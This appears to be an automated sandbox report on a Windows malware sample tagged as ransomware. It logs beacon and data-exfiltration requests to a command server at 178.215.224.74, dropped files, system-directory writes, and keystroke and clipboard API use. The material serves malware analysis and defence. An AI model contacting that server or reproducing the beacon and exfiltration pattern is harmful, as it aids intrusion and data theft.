Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic DNS traffic detected: DNS query: EaUMrTLEnhJoi.EaUMrTLEnhJoi
Source: unknown HTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 639Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 6b 79 4d 6a 45 38 4b 45 45 79 58 46 64 78 5a 33 42 78 58 6d 46 75 62 6d 64 73 63 56 78 44 63 48 42 45 59 58 52 68 58 6c 70 74 59 57 31 70 62 47 56 63 52 47 31 73 63 47 68 72 62 6b 78 31 62 33 4a 7a 58 44 41 35 4d 44 49 79 52 54 41 79 4c 7a 42 44 4d 44 49 6c 4e 6a 55 78 4f 79 38 30 4f 30 49 37 57 55 4a 66 4d 7a 49 77 4b 44 6b 34 4d 6a 73 7a 4b 48 64 70 62 6d 52 76 64 33 45 6f 5a 6d 56 6d 5a 57 78 6d 5a 58 4a 5a 51 46 30 78 4d 6a 41 69 4d 54 49 79 4d 54 41 6f 4d 54 55 36 4c 44 49 7a 4e 79 77 79 4d 6a 51 73 4f 6a 63 79 57 30 68 66 4d 7a 67 77 4b 44 4d 79 4d 6a 4d 77 4b 6a 4d 25 32 46 4d 43 77 77 4d 54 63 75 4d 6a 49 30 4c 6a 63 32 55 30 4a 64 4d 54 41 79 4b 44 45 77 4d 6a 45 78 4b 6a 4d 33 4d 43 34 77 4d 7a 55 75 4d 44 49 32 4c 44 55 30 57 55 4a 66 4d 69 6f 79 4d 6a 30 6f 51 7a 70 55 56 33 46 74 63 6e 46 65 59 32 35 6b 62 57 35 78 56 45 6c 79 63 6b 52 6a 64 47 46 63 55 6d 39 68 62 32 46 73 5a 31 78 45 62 57 35 77 61 47 74 75 52 48 56 76 63 48 74 63 59 33 68 32 64 79 78 6c 65 6d 64 5a 51 46 38 7a 4d 6a 41 71 4d 54 49 34 4d 7a 45 71 4f 54 55 36 4a 6a 49 7a 4e 79 77 77 4d 44 59 75 4e 54 78 54 51 6c 38 79 4b 44 49 77 4e 53 70 44 4f 6c 35 64 63 57 56 79 63 31 35 6a 62 47 5a 74 62 6e 4e 63 51 33 42 34 52 47 4e 32 59 56 78 51 62 32 4e 76 61 32 35 6c 58 6b 5a 76 62 48 42 71 59 57 78 45 64 57 56 79 63 56 52 34 61 6e 56 7a 4c 48 68 72 63 46 6c 49 56 54 4d 79 4d 43 67 78 4d 44 45 79 4d 79 70 42 4d 6c 35 56 63 32 56 77 63 56 78 68 62 6d 5a 76 62 6e 46 63 53 58 42 79 52 6d 46 30 59 31 78 51 62 57 4e 74 61 32 78 6c 58 45 52 76 62 6e 68 71 61 57 35 4d 64 32 39 34 63 31 35 36 61 6e 56 7a 4c 48 70 72 65 46 4e 43 58 7a 45 79 4d 43 6f 78 4d 44 41 78 4d 79 49 7a 4e 7a 67 75 4d 44 4d 31 4c 6a 41 79 4e 43 34 31 4e 46 4e 41 58 77 25 33 44 25 33 44 Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAwKDkyMjE8KEEyXFdxZ3BxXmFubmdscVxDcHBEYXRhXlptYW1pbGVcRG1scGhrbkx1b3JzXDA5MDIyRTAyLzBDMDIlNjUxOy80O0I7WUJfMzIwKDk4MjszKHdpbmRvd3EoZmVmZWxmZXJZQF0xMjAiMTIyMTAoMTU6LDIzNywyMjQsOjcyW0hfMzgwKDMyMjMwKjM%2FMCwwMTcuMjI0Ljc2U0JdMTAyKDEwMjExKjM3MC4wMzUuMDI2LDU0WUJfMioyMj0oQzpUV3FtcnFeY25kbW5xVElyckRjdGFcUm9hb2FsZ1xEbW5waGtuRHVvcHtcY3h2dyxlemdZQF8zMjAqMTI4MzEqOTU6JjIzNywwMDYuNTxTQl8yKDIwNSpDOl5dcWVyc15jbGZtbnNcQ3B4RGN2YVxQb2Nva25lXkZvbHBqYWxEdWVycVR4anVzLHhrcFlIVTMyMCgxMDEyMypBMl5Vc2VwcVxhbmZvbnFcSXByRmF0Y1xQbWNta2xlXERvbnhqaW5Md294c156anVzLHpreFNCXzEyMCoxMDAxMyIzNzguMDM1LjAyNC41NFNAXw%3D%3D
Source: azvw.exe, 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmp String found in binary or memory: ftp://ftp.info-zip.org/pub/infozip
Source: curl.exe, 00000018.00000002.2549469870.0000000002829000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.252/v10/ukyh
Source: curl.exe, 00000018.00000002.2549469870.0000000002829000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.252/v10/ukyh.php?jspo=6
Source: curl.exe, 0000001F.00000002.2635866333.0000000002DE9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000022.00000002.2651944321.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000031.00000002.2785207887.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000002.2811327760.0000000003349000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000003A.00000002.2828321444.00000000033A9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000045.00000002.2913367810.0000000003359000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000048.00000002.2929796324.00000000035C9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000004E.00000002.2962664358.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000051.00000002.2978809870.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000057.00000002.3058564339.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000060.00000002.3114079501.0000000003019000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.
Source: curl.exe, 00000022.00000002.2651944321.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.#
Source: curl.exe, 0000003A.00000002.2828321444.00000000033A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.%
Source: curl.exe, 00000031.00000002.2785207887.0000000002D29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.NNAME=ConsoleSh
Source: curl.exe, 00000057.00000002.3058564339.0000000002E49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.c
Source: curl.exe, 00000060.00000002.3114079501.0000000003019000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?gi
Source: curl.exe, 0000004E.00000002.2962664358.0000000002A09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1
Source: curl.exe, 0000003A.00000002.2828321444.00000000033A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=31
Source: curl.exe, 00000057.00000002.3058564339.0000000002E49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldml
Source: curl.exe, 00000028.00000002.2695353799.00000000031D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D
Source: curl.exe, 00000031.00000002.2785207887.0000000002D29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D
Source: curl.exe, 0000001F.00000002.2635866333.0000000002DE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=5
Source: curl.exe, 0000002E.00000002.2734583748.0000000002BB9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000002.2811327760.0000000003349000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000042.00000002.2875914285.0000000002EB8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000045.00000002.2913367810.0000000003359000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000004B.00000002.2945763230.0000000002D59000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000051.00000002.2978809870.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000054.00000002.3000425346.0000000003029000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000005B.00000002.3090746109.0000000002E09000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000063.00000002.3132233992.00000000034B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6
Source: curl.exe, 00000045.00000002.2913367810.0000000003359000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=60%
Source: curl.exe, 00000037.00000002.2811327760.0000000003349000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6Q
Source: curl.exe, 00000051.00000002.2978809870.00000000031E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6T
Source: curl.exe, 00000022.00000002.2651944321.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6c
Source: curl.exe, 00000042.00000002.2875914285.0000000002EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6h
Source: curl.exe, 00000048.00000002.2929796324.00000000035C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=7
Source: curl.exe, 00000048.00000002.2929796324.00000000035C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=7wk0
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Rocky.0.dr, InnoSphere.scr.10.dr, Finish.com.1.dr String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Disco.88.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Rocky.0.dr, InnoSphere.scr.10.dr, Finish.com.1.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Rocky.0.dr, InnoSphere.scr.10.dr, Finish.com.1.dr String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Disco.88.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RevenueDevices.exe.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Rocky.0.dr, InnoSphere.scr.10.dr, Finish.com.1.dr String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Disco.88.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Rocky.0.dr, InnoSphere.scr.10.dr, Finish.com.1.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Disco.88.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Rocky.0.dr, InnoSphere.scr.10.dr, Finish.com.1.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Finish.com, 0000000A.00000000.2072323942.0000000000625000.00000002.00000001.01000000.00000007.sdmp, InnoSphere.scr, 00000010.00000000.2231353404.0000000000F05000.00000002.00000001.01000000.00000009.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.dr String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: azvw.exe, 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmp, zip.exe.52.dr String found in binary or memory: http://www.info-zip.org/
Source: azvw.exe, 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmp, zip.exe.52.dr, azvw.exe.10.dr String found in binary or memory: http://www.info-zip.org/zip-bug.html;
Source: PsInfo.exe.52.dr, PsInfo64.exe.52.dr String found in binary or memory: http://www.sysinternals.com
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Finish.com.1.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Disco.88.dr String found in binary or memory: https://www.globalsign.com/repository/06
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004050F9
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044D1

Spam, unwanted Advertisements and Ransom Demands
barindex
Writes many files with high entropy
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Los entropy: 7.99768365381 Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Become entropy: 7.99784070507 Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Howard entropy: 7.99757648221 Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Vermont entropy: 7.99725611197 Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Bt entropy: 7.99648411738 Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Vatican entropy: 7.9972950771 Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Mental entropy: 7.99804736681 Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\768032\G entropy: 7.99966998402 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com File created: C:\Users\user\AppData\Local\InnoSphere Dynamics\l entropy: 7.99966998402 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com File created: C:\Users\user\AppData\Roaming\DolphinDumps\xhwq.zip entropy: 7.99812683975 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Users\user\AppData\Local\Temp\Showcase entropy: 7.99817987302 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Users\user\AppData\Local\Temp\Parts entropy: 7.99745443978 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Users\user\AppData\Local\Temp\Bailey entropy: 7.99784242676 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Users\user\AppData\Local\Temp\Samples entropy: 7.99803767944 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Users\user\AppData\Local\Temp\Considerations entropy: 7.99749833976 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Users\user\AppData\Local\Temp\Shepherd entropy: 7.99642551519 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Users\user\AppData\Local\Temp\Eight entropy: 7.99641122578 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Users\user\AppData\Local\Temp\Norman entropy: 7.99777953585 Jump to dropped file
Too many similar processes found
Source: curl.exe Process created: 51
Source: cmd.exe Process created: 60

System Summary
barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 0_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 88_2_00403883
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\ThouRevolution Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Windows\TmpMoon
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Windows\NotifiedAaron
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Windows\BrushSub
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Windows\McLol
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040737E 0_2_0040737E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406EFE 0_2_00406EFE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004079A2 0_2_004079A2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004049A8 0_2_004049A8
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00408850 52_2_00408850
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_0040C820 52_2_0040C820
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00403490 52_2_00403490
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00411170 52_2_00411170
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_0040E900 52_2_0040E900
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_0040CE49 52_2_0040CE49
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_0040CE50 52_2_0040CE50
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00402210 52_2_00402210
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00408EC0 52_2_00408EC0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00417EE3 52_2_00417EE3
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00402EF0 52_2_00402EF0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_0040F280 52_2_0040F280
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00409FD0 52_2_00409FD0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_004093E0 52_2_004093E0
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_0040497C 88_2_0040497C
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_00406ED2 88_2_00406ED2
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_004074BB 88_2_004074BB
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 004062CF appears 57 times
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: String function: 004062A3 appears 58 times
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: String function: 00412920 appears 282 times
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: String function: 00406640 appears 48 times
PE / OLE file has an invalid certificate
Source: file.exe Static PE information: invalid certificate
PE file contains executable resources (Code or Archives)
Source: PsInfo.exe.52.dr Static PE information: Resource name: BINRES type: PE32 executable (console) Intel 80386, for MS Windows
Source: PsInfo64.exe.52.dr Static PE information: Resource name: BINRES type: PE32+ executable (console) x86-64, for MS Windows
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.2037421930.00000000006E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exe, 00000000.00000003.2036612746.00000000006E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.rans.spre.expl.evad.winEXE@323/65@3/2
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00412830 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,LookupPrivilegeValueA,GetLastError,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,CloseHandle,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle, 52_2_00412830
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044D1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004024FB CoCreateInstance, 0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com File created: C:\Users\user\AppData\Local\InnoSphere Dynamics Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1772:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6676:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_03
